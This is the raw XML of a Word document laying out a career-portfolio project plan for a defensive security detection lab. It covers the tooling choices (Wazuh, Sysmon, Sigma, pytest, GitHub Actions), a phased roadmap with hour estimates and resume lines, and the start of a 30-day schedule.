              <w:t xml:space="preserve">Parse Windows .evtx (Phase 2+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pure-Python evtx reader, no Windows needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why so few dependencies: every dependency is something you must be able to explain and a potential</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">supply-chain risk. A short list is a feature, not a limitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="security-tooling"/>
      <w:r>
        <w:t xml:space="preserve">Security tooling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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Wazuh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(SIEM/XDR core): collection, agents, rules, MITRE mapping, dashboard.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Sysmon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Windows endpoint telemetry): the richest free source of process/network/registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">events; the foundation of most endpoint detections.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Sigma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the vendor-neutral rule format the detection content is written in.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MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the framework every detection maps to.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Atomic Red Team style tests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: safe, documented attack simulations to generate telemetry.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Microsoft Sentinel / Defender XDR + KQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(optional track): cloud SIEM parity for SC-200.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="storage"/>
      <w:r>
        <w:t xml:space="preserve">Storage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Files, not a database. Detections are YAML/XML files in git. Sample logs are JSON Lines. Reports</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are Markdown. Why: for this scale, the filesystem plus git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database, and it gives free</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">versioning, diffing, and review. A database would add operational weight with no benefit at the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">portfolio scale. If volume ever demanded it, the natural next step is SQLite (still one file, still</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in git-adjacent tooling), and that is a good thing to mention as "what I would do at scale."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="testing"/>
      <w:r>
        <w:t xml:space="preserve">Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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pytest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for unit tests,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pytest-cov</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why: it is the default in modern Python, fixtures keep tests readable, and green tests on GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are a credibility signal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="quality-tooling"/>
      <w:r>
        <w:t xml:space="preserve">Quality tooling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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ruff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(lint + format): one fast tool replacing flake8, isort, and black.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mypy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(static types): catches whole classes of bugs before runtime and documents intent.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pre-commit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: runs the above plus a private-key scanner before each commit, so the public-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">facing history stays clean.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="cicd"/>
      <w:r>
        <w:t xml:space="preserve">CI/CD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Actions.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Why: native to GitHub, free for this use, and the green check on every PR is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">visible proof the project is maintained. The pipeline lints, type-checks, tests on Python 3.10 to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.12, and validates that every detection rule parses. No CD (deployment) because there is nothing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to deploy; this is a toolkit and a lab, not a hosted service. Saying "I deliberately did not add</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deployment because it would be complexity without value" is a stronger answer than a fake pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="deployment--run-model"/>
      <w:r>
        <w:t xml:space="preserve">Deployment / run model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run locally in a virtualenv (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">make install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), or point it at logs exported from the Wazuh lab.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The Wazuh stack itself runs either on VMs or via the docker lab in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">labs/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. There is no cloud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">requirement for the core, which keeps cost at zero.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9" w:name="X838a99749d1a6e475a73fb5e167693654932476"/>
      <w:r>
        <w:t xml:space="preserve">05. Development Roadmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Assumptions: Ravi works full time, roughly 1 to 2 hours on weekdays and more on weekends. Estimates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are honest ranges of focused hours, not calendar time. The rule is that the project is shippable and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">demoable at the end of every phase. Never leave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broken.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="phase-0---foundation"/>
      <w:r>
        <w:t xml:space="preserve">Phase 0 - Foundation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50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Goals:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stand up the repo, docs, CI, and a working lab that produces logs.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Skills learned:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">git/GitHub workflow, project structure, Wazuh + Sysmon install, VM networking.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Estimated hours:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">12 to 18.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Deliverables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">this repo scaffold pushed; Wazuh manager + one agent running; Sysmon logging;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">first sample logs captured; CI green.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Definition of done:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">make install &amp;&amp; make test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">passes locally and in CI; a Sysmon event from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the Windows VM is visible in the Wazuh dashboard; README quickstart works from a clean clone.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GitHub milestone:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 0: Foundation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Resume value:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"Built and documented a self-hosted Wazuh + Sysmon detection lab with CI."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="phase-1---mvp"/>
      <w:r>
        <w:t xml:space="preserve">Phase 1 - MVP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51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Goals:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">collect one log source, normalize it, and fire the first three detections end to end.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Skills learned:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">log normalization, common schema design, first Sigma rules, pytest.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Estimated hours:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">15 to 20.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Deliverables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SampleCollector + normalizer for Sysmon; 3 to 5 Sigma rules with tests;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blueforge detect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prints matches; first auto-generated report.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Definition of done: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blueforge detect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on sample logs fires the expected rules and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">writes a Markdown report; every rule has a passing test and a MITRE mapping.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GitHub milestone:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: MVP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Resume value:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"Designed a normalized event schema and a tested detection pipeline in Python."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="phase-2---detection-engine"/>
      <w:r>
        <w:t xml:space="preserve">Phase 2 - Detection Engine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52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Goals:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">grow to 20+ detections across sources, formalize the engine, add ATT&amp;CK coverage.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Skills learned:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detection engineering at volume, false-positive tuning, ATT&amp;CK mapping, .evtx parsing.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Estimated hours:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">25 to 35.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Deliverables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">20 Sigma rules + Wazuh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">local_rules.xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; evtx collector;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">attack_coverage.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">report; documented FP notes per rule.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Definition of done:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">coverage script reports 15+ unique techniques; each rule documents at least</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">one false positive and an investigation step; Wazuh rules tested with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wazuh-logtest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GitHub milestone:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Detection Engine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Resume value:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"Authored 20+ MITRE-mapped detections with documented tuning and tests."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="phase-3---threat-hunting"/>
      <w:r>
        <w:t xml:space="preserve">Phase 3 - Threat Hunting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Goals:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">turn detections into hunts; simulate attacks; build timelines.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Skills learned:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hypothesis-driven hunting, attack simulation, timeline reconstruction.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Estimated hours:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">20 to 30.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Deliverables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hunting query pack; 3 to 5 documented attack simulations (safe, reversible);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">timeline generator that orders events for an incident; investigation guides.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Definition of done:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">each simulation has a matching detection and a written hunt with expected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">logs and steps; a timeline is generated from a multi-event scenario.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GitHub milestone:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Threat Hunting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Resume value:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"Ran attack simulations and built hunts and timelines to validate detections."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="phase-4---automation"/>
      <w:r>
        <w:t xml:space="preserve">Phase 4 - Automation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Goals:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">automate triage: IOC extraction, enrichment, report generation, and Sentinel/KQL parity.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Skills learned:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SOAR-style automation, API integration, threat intel, KQL, SC-200 topics.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Estimated hours:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">25 to 35.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Deliverables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enrichment with real threat-intel lookups; end-to-end "logs in, report out"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">automation; KQL parity rules in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detections/sentinel/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Definition of done:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">one command takes raw logs and produces an enriched incident report; at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">least 5 KQL rules mirror Sigma rules; API keys handled via env only.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GitHub milestone:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Automation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Resume value:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"Automated alert triage (IOC extraction, enrichment, reporting) and built KQL parity in Sentinel."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="phase-5---ai-integration-optional"/>
      <w:r>
        <w:t xml:space="preserve">Phase 5 - AI Integration (optional)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55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Goals:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">add a local LLM assistant for alert explanation and natural-language queries.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Skills learned:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">local LLM integration, prompt design, safe AI-in-security patterns.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Estimated hours:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">15 to 25.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Deliverables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">optional module that summarizes an alert in plain English and suggests next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">steps, running against a local model; clearly isolated so the core never depends on it.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Definition of done:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the assistant explains a real alert usefully; it is off by default and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rest of the platform works without it.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GitHub milestone:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 5: AI Assistant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Resume value:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"Prototyped a local-LLM alert-explanation assistant with no data leaving the host."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="phase-6---enterprise-features"/>
      <w:r>
        <w:t xml:space="preserve">Phase 6 - Enterprise Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Goals:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">polish toward how a real team would run it: coverage dashboard, richer reporting, docs.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Skills learned:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">metrics, dashboards, documentation at product quality.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Estimated hours:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">20 to 30.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Deliverables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ATT&amp;CK Navigator layer export; a simple coverage/metrics dashboard; hardened docs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and a demo GIF; tagged v1.0 release.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Definition of done:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Navigator layer renders; README shows a demo; v1.0 tagged with release notes.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GitHub milestone:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 6: v1.0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Resume value:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"Shipped a documented v1.0 with ATT&amp;CK coverage visualization and metrics."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="total"/>
      <w:r>
        <w:t xml:space="preserve">Total</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Roughly 130 to 190 focused hours to reach a strong v1.0. At about 8 to 10 hours a week that is a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">four to five month project, which is exactly the "continue improving for months" horizon you want on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a resume and in interviews.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8" w:name="X3e37c36f52c1c6705431f449a7f27a43950f430"/>
      <w:r>
        <w:t xml:space="preserve">06. First 30 Days</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A concrete day-by-day plan for Phase 0 into early Phase 2. Weekdays assume about 1 to 2 hours;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">weekend days assume more. If a day slips, shift the plan, do not skip the commit habit. The goal of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">month one is a green, documented repo with a running lab and the first real detections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Legend:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task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Learn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Output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Commit message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Learn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Clone repo, read README + docs/00, run</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">make install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make test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Project layout, venvs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Working local env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chore: local dev environment set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schema.py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normalizer/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">end to end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Common schema idea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Notes in</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">docs/lessons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docs(lessons): notes on the common event schema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Install VirtualBox, create Windows 10 VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VM basics, host-only net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
